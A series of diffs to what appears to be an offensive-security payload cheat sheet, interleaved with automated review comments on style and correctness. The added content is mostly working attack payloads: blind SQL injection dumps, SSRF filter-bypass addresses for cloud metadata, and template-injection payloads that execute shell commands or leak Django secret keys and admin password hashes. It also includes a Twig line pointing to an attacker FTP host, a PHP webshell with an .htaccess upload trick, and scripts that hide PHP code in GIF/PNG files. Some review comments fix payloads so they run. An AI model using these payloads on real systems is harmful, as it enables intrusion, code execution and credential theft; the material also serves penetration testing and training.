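Review bot: the "Grant privileges" step does not say which account runs it; `dbms_java.grant_permission` grants to the hard-coded `SCOTT` schema, so a sentence stating that the grantor needs the corresponding Java privilege (a DBA-level account) would stop readers from expecting it to work from the injected user's own session. Two smaller points: the `select * from dba_java_policy` / `user_java_policy` statements have no terminating semicolons while the `exec` lines do, so pick one convention; and the same two views are the audit check a DBA should run to spot `<<ALL FILES>>` / `writeFileDescriptor` grants, which is worth saying explicitly under "List Java privileges".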
@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
@ -34,6 +34,16 @@
/**/
```

## PostgreSQL chain injection points symbols
```sql
; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
|| #or statement

# usage examples:
/?whatever=1;(select 1 from pg_sleep(5))
/?whatever=1||(select 1 from pg_sleep(5))
```

## PostgreSQL Version

```sql
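Review bot: the comment on `||` is wrong: in PostgreSQL `||` is the string concatenation operator, not an OR (`OR` is the keyword; `|` is bitwise or), so `1||(select 1 from pg_sleep(5))` works because the subquery's result is concatenated onto the text `1`, and the comment should say so. Also, `#` is not a comment marker in PostgreSQL SQL, so in a fence tagged `sql` the explanatory lines should use `--`; and the heading "PostgreSQL chain injection points symbols" would read better as "PostgreSQL - Chaining statements".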
@ -140,6 +150,29 @@ Note, with the above queries, the output needs to be assembled in memory. For la
```

## PostgreSQL Time Based
#### Identify time based

```sql
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
```

#### Database dump time based
```sql
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
```

#### Table dump time based
```sql
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
```
#### columns dump time based
```sql
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name limit 1
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name where column_name='value' limit 1
```


```sql
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
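Review bot: the two "columns dump" queries have the column and table swapped: `column` is a reserved word and `column_name` is not a table, so `substring(column,1,1) ... from column_name` will not parse; following the table query above, it should be `select case when substring(column_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.columns where table_name='value' limit 1`. The compared character (`'1'` in two queries, `'a'` in the third) is the guessed character and should be written as a placeholder such as `'[CHAR]'` so it is not read as a fixed value. Style: the headings jump from `##` to `####`, and "columns dump time based" is the only one in lower case.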
@ -612,6 +612,13 @@ Obfuscated query
1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2
```

## Labs

* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)

## References

* Detect SQLi

@ -10,6 +10,7 @@
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
* [Boolean - Extract info](#boolean---extract-info)
* [Boolean - Error based](#boolean---error-based)
* [Time based](#time-based)
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
@ -77,6 +78,11 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
```

## Boolean - Error based

```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```

## Time based

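Review bot: the new "Boolean - Error based" section gives the payload without the one sentence that explains it: `load_extension(1)` always raises an SQL error (either "not authorized" when extension loading is disabled, or a load failure otherwise), so the condition in `[BOOLEAN_QUERY]` becomes observable as error-versus-no-error. Add that sentence, and since the section is derived from the "SQLite Error Based Injection for Enumeration" link added in References, cite it here.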
@ -84,6 +90,7 @@ CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```


## Remote Command Execution using SQLite command - Attach Database

```sql
@ -103,3 +110,4 @@ Note: By default this component is disabled
## References

[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)

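Review bot: the two reference entries have no list markers, so Markdown renders them as a single paragraph with the second link run onto the first; prefix both with `* ` as the other files' References sections do.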
@ -580,6 +580,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
```

More urls to include
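Review bot: the new mixed-encoding entry is the only one in the block without a trailing slash (`http://0251.254.169.254` versus `http://0251.0376.0251.0376/`); add it for consistency. The block would also benefit from one line stating the defensive takeaway these variants illustrate: a deny-list that compares the raw host string against `169.254.169.254` misses every one of them, so a filter has to parse the host into an IP address (resolving it, then checking the resulting address) before comparing.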
@ -828,6 +829,14 @@ curl http://rancher-metadata/<version>/<path>

More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/

## Labs

* [Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost)
* [Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system)
* [SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
* [SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter)
* [SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection)


## References

@ -863,3 +872,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080)

@ -15,7 +15,7 @@
- [Expression Language EL - Basic injection](#expression-language-el---basic-injection)
- [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution)
- [Expression Language EL - Code Execution](#expression-language-el---code-execution)
- [Freemarker](#freemarker)
- [Java - Freemarker](#freemarker)
- [Freemarker - Basic injection](#freemarker---basic-injection)
- [Freemarker - Read File](#freemarker---read-file)
- [Freemarker - Code execution](#freemarker---code-execution)
@ -26,14 +26,15 @@
- [Groovy - HTTP request:](#groovy---http-request)
- [Groovy - Command Execution](#groovy---command-execution)
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
- [Handlebars](#handlebars)
- [JavaScript - Handlebars](#handlebars)
- [Handlebars - Command Execution](#handlebars---command-execution)
- [Jade / Codepen](#jade--codepen)
- [Java](#java)
- [Java - Basic injection](#java---basic-injection)
- [Java - Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables)
- [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
- [Jinja2](#jinja2)
- [Django Template](#django-template)
- [Python - Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format)
- [Jinja2 - Debug Statement](#jinja2---debug-statement)
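Review bot: the new table-of-contents entry `[Django Template](#django-template)` does not match the heading this commit adds further down, `## Django Templates`, whose GitHub anchor is `#django-templates`; rename the entry to `- [Python - Django Templates](#django-templates)` so the link resolves and follows the "Language - Engine" naming the other entries in this hunk adopt. The entries renamed to "JavaScript - Handlebars" and "Python - Jinja2" keep their old anchors, which is fine only as long as the headings themselves were not renamed; worth checking.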
@ -42,21 +43,22 @@
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter bypass](#jinja2---filter-bypass)
- [Jinjava](#jinjava)
- [Java - Jinjava](#jinjava)
- [Jinjava - Basic injection](#jinjava---basic-injection)
- [Jinjava - Command execution](#jinjava---command-execution)
- [Lessjs](#lessjs)
- [JavaScript - Lessjs](#lessjs)
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Plugins](#plugins)
- [Mako](#mako)
- [Python - Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
- [Pebble](#pebble)
- [Java - Pebble](#pebble)
- [Pebble - Basic injection](#pebble---basic-injection)
- [Pebble - Code execution](#pebble---code-execution)
- [Ruby](#ruby)
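Review bot: the new entry `[Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)` is the only Jinja2 sub-entry whose text lacks the "Jinja2 - " prefix that both its anchor and the heading added later in this commit (`#### Jinja2 - Forcing output on blind RCE`) carry; rename it to `- [Jinja2 - Forcing output on blind RCE](...)` to match its siblings.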
@ -64,18 +66,24 @@
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
- [Ruby - List files and directories](#ruby---list-files-and-directories)
- [Ruby - Code execution](#ruby---code-execution)
- [Smarty](#smarty)
- [Twig](#twig)
- [PHP - Smarty](#smarty)
- [PHP - Twig](#twig)
- [Twig - Basic injection](#twig---basic-injection)
- [Twig - Template format](#twig---template-format)
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
- [Twig - Code execution](#twig---code-execution)
- [Velocity](#velocity)
- [Java - Velocity](#velocity)
- [PHP - patTemplate](#pattemplate)
- [PHP - PHPlib](#phplib-and-html_template_phplib)
- [PHP - Plates](#plates)
- [References](#references)

## Tools

Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
Recommended tools:

[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool

e.g:

```powershell
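Review bot: "e.g:" should be "e.g.:" (the abbreviation keeps its second period), and the fence opened at the end of this hunk is tagged `powershell` although the commands inside it (`python2.7 ./tplmap.py ...`) are plain shell invocations; `bash` or `shell` is the right tag. Since the tool list now has two entries, the two tool paragraphs would read better as list items under "Recommended tools:" rather than as bare paragraphs separated by "e.g:".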
@ -84,6 +92,16 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```

[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap)

e.g:

```powershell
python3 ./sstimap.py -u 'https://example.com/page?name=John' -s
python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade
python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
```

## Methodology

![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
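Review bot: the third SSTImap example has no `-u` target, so a short comment saying that `-i` starts the interactive mode in which the URL is set afterwards would prevent readers from treating the line as a complete invocation; likewise say that the `Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk` header is a placeholder (it decodes to `login:secret_password`). The fence is tagged `powershell` for `python3 ./sstimap.py ...` commands; tag it `bash` like the shell snippets elsewhere.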
@ -311,6 +329,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val
## Java

### Java - Basic injection
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.

```java
${7*7}
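Review bot: the added blockquote lists `#{...}`, `*{...}`, `@{...}` and `~{...}` without saying where they come from; these are the Thymeleaf Standard Dialect expression types (message, selection, link and fragment expressions alongside `${...}`), so name the engine, otherwise readers will try them against engines that only know `${...}`. Also insert a blank line between the `### Java - Basic injection` heading and the `>` quote, as the other sections do.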
@ -336,6 +355,67 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex

---

## Django Templates

Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.

### Detection


```python
{% csrf_token %} # Causes error with Jinja2
{{ 7*7 }} # Error with Django Templates
ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
```

### Django Templates for post-exploitation

```python
# Variables
{{ variable }}
{{ variable.attr }}

# Filters
{{ value|length }}

# Tags
{% csrf_token %}
```

### Cross-site scripting

```python
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
```

### Debug information leak

```python
{% debug %}
```

### Leaking app’s Secret Key

```python
{{ messages.storages.0.signer.key }}
```

### Admin Site URL leak


```
{% include 'admin/base.html' %}
```

### Admin username and password hash leak


```
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}
```

## Jinja2

[Official website](https://jinja.palletsprojects.com/)
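Review bot: the opening sentence attributes the two backends to the wrong thing: it is the Django framework (its `TEMPLATES` setting) that ships two template backends, the Django template language and Jinja2, not "Django template language" itself, and "Django Templates is much simpler engine" needs an article ("is a much simpler engine"). The fences are inconsistent: most are tagged `python` although they contain template syntax, and the last two ("Admin Site URL leak", "Admin username and password hash leak") are untagged; tag them all the same way (`django` or `html`). For the Cross-site scripting pair, state that the first line is escaped by the engine's autoescaping and only the `| safe` variant renders the script, otherwise both look equivalent.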
@ -417,15 +497,30 @@ Listen for connection
nc -lnvp 8000
```

#### Jinja2 - Forcing output on blind RCE

You can import Flask functions to return an output from the vulnerable page.

```py
{{
x.__init__.__builtins__.exec("from flask import current_app, after_this_request
@after_this_request
def hook(*args, **kwargs):
from flask import make_response
r = make_response('Powned')
return r
")
}}
```


#### Exploit the SSTI by calling os.popen().read()

These payloads are context-free, and do not require anything, except being in a jinja2 Template object:

```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}

{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
```

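Review bot: the payload starts from `x.__init__.__builtins__` but nothing says what `x` is; the text should state that `x` stands for any Python-level object available in the template context (the same role `cycler`, `joiner` or `namespace` play in the payloads just below), since the section reads as if `x` were a fixed name. `current_app` is imported but never used, and the body of `hook` must stay indented inside the string passed to `exec` or Python raises an IndentationError, which is easy to lose when the block is copied; a comment to that effect, and a note that `'Powned'` is just the canary string whose appearance in the response confirms execution, would make the section self-explanatory.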
@ -433,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet):

```python
{{ cycler.__init__.__globals__.os.popen('id').read() }}

{{ joiner.__init__.__globals__.os.popen('id').read() }}

{{ namespace.__init__.__globals__.os.popen('id').read() }}
```

@ -829,6 +922,9 @@ $output = $twig > render (
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
```
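Review bot: the new `reduce`, `map` and `sort`-with-callback lines are added without a version note, while the `_self.env.*` lines above them target older Twig releases; the `filter`, `map` and `reduce` filters only exist from Twig 1.41 / 2.10 onwards, so state the applicable versions so readers know which payload family to try against which release. Also worth one sentence: all of these work only because the application passes a raw PHP function name (`system`) as the filter callback, which is exactly what Twig's sandbox policy blocks.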
@ -866,6 +962,126 @@ $str.valueOf($chr.toChars($out.read()))

---

## patTemplate

> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts

```xml
<patTemplate:tmpl name="page">
This is the main page.
<patTemplate:tmpl name="foo">
It contains another template.
</patTemplate:tmpl>
<patTemplate:tmpl name="hello">
Hello {NAME}.<br/>
</patTemplate:tmpl>
</patTemplate:tmpl>
```

---

## PHPlib and HTML_Template_PHPLIB

[HTML_Template_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) is the same as PHPlib but ported to Pear.

`authors.tpl`

```html
<html>
<head><title>{PAGE_TITLE}</title></head>
<body>
<table>
<caption>Authors</caption>
<thead>
<tr><th>Name</th><th>Email</th></tr>
</thead>
<tfoot>
<tr><td colspan="2">{NUM_AUTHORS}</td></tr>
</tfoot>
<tbody>
<!-- BEGIN authorline -->
<tr><td>{AUTHOR_NAME}</td><td>{AUTHOR_EMAIL}</td></tr>
<!-- END authorline -->
</tbody>
</table>
</body>
</html>
```

`authors.php`

```php
<?php
//we want to display this author list
$authors = array(
'Christian Weiske' => 'cweiske@php.net',
'Bjoern Schotte' => 'schotte@mayflower.de'
);

require_once 'HTML/Template/PHPLIB.php';
//create template object
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');

//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));

//display the authors
foreach ($authors as $name => $email) {
$t->setVar('AUTHOR_NAME', $name);
$t->setVar('AUTHOR_EMAIL', $email);
$t->parse('authorline_ref', 'authorline', true);
}

//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>
```

---

## Plates

Plates is inspired by Twig but a native PHP template engine instead of a compiled template engine.

controller:

```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');

// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);
```

page template:

```php
<?php $this->layout('template', ['title' => 'User Profile']) ?>

<h1>User Profile</h1>
<p>Hello, <?=$this->e($name)?></p>
```

layout template:

```php
<html>
<head>
<title><?=$this->e($title)?></title>
</head>
<body>
<?=$this->section('content')?>
</body>
</html>
```

---

## References

* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
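Review bot: the three new PHP sections (patTemplate, PHPlib/HTML_Template_PHPLIB, Plates) contain only each engine's ordinary usage example and no injection payload, detection marker or reference, so they do not tell the reader what to test or what a vulnerable usage looks like; at minimum each should say where user input would have to land to matter (template source passed to `setFile`/`parse`, or a template path derived from input in `render`) and note that the Plates example is the safe pattern, since `$this->e($name)` escapes the value. In `authors.php`, `$t =& new HTML_Template_PHPLIB(...)` is the old assign-new-by-reference syntax, deprecated in PHP 5.3 and a parse error from PHP 7 onwards; write `$t = new HTML_Template_PHPLIB(...)`. Style: "controller:", "page template:" and "layout template:" should be capitalised or formatted as the `authors.tpl` / `authors.php` labels above them are.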
@ -889,3 +1105,5 @@ $str.valueOf($chr.toChars($out.read()))
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
@ -52,22 +52,22 @@ function validate_cookie($cookie,$key){
...
```

The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user.
The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user.

If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass.
If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass.

```
```ps1
"0e768261251903820937390661668547" == "0"
```

We have control over 3 elements in the cookie:
- $username - username you are targeting, probably "admin"
- $hmac - the provided hash, "0"
- $expiration - a UNIX timestamp, must be in the future
- `$username` - username you are targeting, probably "admin"
- `$hmac` - the provided hash, "0"
- `$expiration` - a UNIX timestamp, must be in the future

Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC.

```
```ps1
hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49"
hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4"
hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b"
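Review bot: the backtick pass is incomplete: `$cookie` gets code formatting but `$key` in the same sentence does not ("The `$cookie` variable ... The $key variable"). Both fences are retagged `ps1`, yet `"0e768..." == "0"` is a PHP comparison and the `hash_hmac(admin|...) -> "..."` lines are pseudo-output, so `php` is the tag to use (or none). The sentence "the check will pass" should also say why: `==` between two numeric strings compares them as numbers in PHP, which is the whole point of the section and what the fix, `hash_equals()` or `===`, removes.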
@ -80,8 +80,10 @@ hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e17489230

If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.

| Hash | “Magic” Number / String | Magic Hash | Found By / Description |
| Hash | "Magic" Number / String | Magic Hash | Found By / Description |
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
| MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
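Review bot: "PHP will treat the hash as a float" is only true under loose comparison; the sentence should read "when compared with `==`, PHP will treat the hash as a float", since `===` and `hash_equals()` compare the strings byte by byte and are the fix the section never names. The table's alignment row right-aligns the "Found By / Description" column (`-------------:`), which looks odd for a column of links; left alignment matches the other columns.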
@ -106,3 +108,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
* [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes)
* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html)
@ -0,0 +1 @@
AddType application/x-httpd-php .rce
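Review bot: the new one-line file has no comment and its path is not shown in this rendering; a leading `# .htaccess: make Apache run *.rce files through the PHP handler` line would make the file self-describing, and it is worth stating that the directive only takes effect where the server honours per-directory overrides (`AllowOverride FileInfo` or `All`), which is the setting to review when assessing upload directories.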

@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
```

# .htaccess simple php

Upload an .htaccess with : `AddType application/x-httpd-php .rce`
Then upload any file with `.rce` extension.

# .htaccess upload as image

If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
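Review bot: the `# .htaccess upload as image` section stops at "create a `.htaccess/image` polyglot" without including the polyglot file or linking to it, so the reader is left with nothing to upload; add the file beside the `.rce` example or point to where it lives. On the same hunk, `Upload an .htaccess with :` carries a stray space before the colon, and the two new sections use top-level `#` headings, which should be checked against the heading level the rest of this README uses.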

@ -1,7 +1,6 @@
#!/usr/bin/python

"""

Bulletproof Jpegs Generator
Copyright (C) 2012 Damien "virtualabs" Cauquil


@ -18,7 +17,11 @@
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.


-------------
# How to use
b.php?c=ls
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
"""
from __future__ import print_function
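Review bot: the `# How to use` text moved into the module docstring says only `b.php?c=ls`, without stating what `b.php` is or how the generator's output ends up being served under that name, so the usage is not self-contained; one sentence connecting the generated JPEG to that request would fix it. The usage block is also spliced into the GPL notice after the address line; placing it above the license text keeps the notice intact.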

@ -0,0 +1,22 @@
<?php
// createGIFwithGlobalColorTable.php
$_file="example.gif";
$_payload="<?php evil();?>";
$_width=200;
$_height=200;
if(strlen($_payload)%3!=0){
echo "payload%3==0 !"; exit();
}
$im = imagecreate($_width, $_height);
$_hex=unpack('H*',$_payload);

$colors_hex=str_split($_hex[1], 6);

for($i=0; $i < count($colors_hex); $i++){
$_color_chunks=str_split($colors_hex[$i], 2);
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
imagesetpixel($im,$i,1,$color);
}

imagegif($im,$_file);
?>
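Review bot: the length check's message `payload%3==0 !` states the opposite of what it reports (the script exits precisely when the length is not a multiple of 3); say "payload length must be a multiple of 3" and exit with a non-zero status so callers can detect the failure. There is also no guard that `count($colors_hex)` stays within `$_width`: with a 200-pixel-wide image, a payload over 600 bytes makes `imagesetpixel()` receive an x coordinate outside the image and the remaining chunks are silently dropped, so either derive `$_width` from the payload length (as `createPNGwithPLTE.php` in this same change does) or check it. The trailing `?>` on a script-only file is unnecessary and invites accidental whitespace output.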

@ -0,0 +1,28 @@
<?php
//createPNGwithPLTE.php
// bypass imageCreateFromPng and imagepng
$_payload="<?php phpinfo()?> ";
$_pay_len=strlen($_payload);
if(strlen($_payload)%3!=0){
echo "payload%3==0 !"; exit();
}


$width=$_pay_len/3;
$height=20;
//$im = imageCreateFromPng("existing.png");
$im = imagecreate($width, $height);

$_hex=unpack('H*',$_payload);
$_chunks=str_split($_hex[1], 6);

for($i=0; $i < count($_chunks); $i++){

$_color_chunks=str_split($_chunks[$i], 2);
$color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));

imagesetpixel($im,$i,1,$color);

}

imagepng($im,"example.png");
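Review bot: the commented-out `imageCreateFromPng("existing.png")` is dead code sitting under a comment that says the script is about `imageCreateFromPng`; either document that the reader can swap it in to start from an existing image or remove it. The `%3` check repeats the inverted message from `createGIFwithGlobalColorTable.php`, and `$height=20` while only row `1` is ever written; a comment explaining the extra rows, or a smaller height, would make the intent clear.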

@ -1,5 +0,0 @@
# How to use
b.php?c=ls


Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l

@ -9,7 +9,7 @@
* [Defaults extensions](#defaults-extensions)
* [Upload tricks](#upload-tricks)
* [Filename vulnerabilities](#filename-vulnerabilities)
* [Picture upload with LFI](#picture-upload-with-lfi)
* [Picture compression](#picture-compression-)
* [Configuration Files](#configuration-files)
* [CVE - Image Tragik](#cve---image-tragik)
* [CVE - FFMpeg](#cve---ffmpeg)
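Review bot: the new TOC entry links to `#picture-compression-` with a trailing hyphen, but the heading this change introduces is `### Picture Compression`, whose GitHub slug is `#picture-compression`; the trailing hyphen looks like a leftover from a heading that ended in an extra character and will leave the link dead. Use `#picture-compression`, and match the heading's capitalisation in the entry text.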

@ -107,12 +107,16 @@ Also you upload:
- HTML/SVG files to trigger an XSS
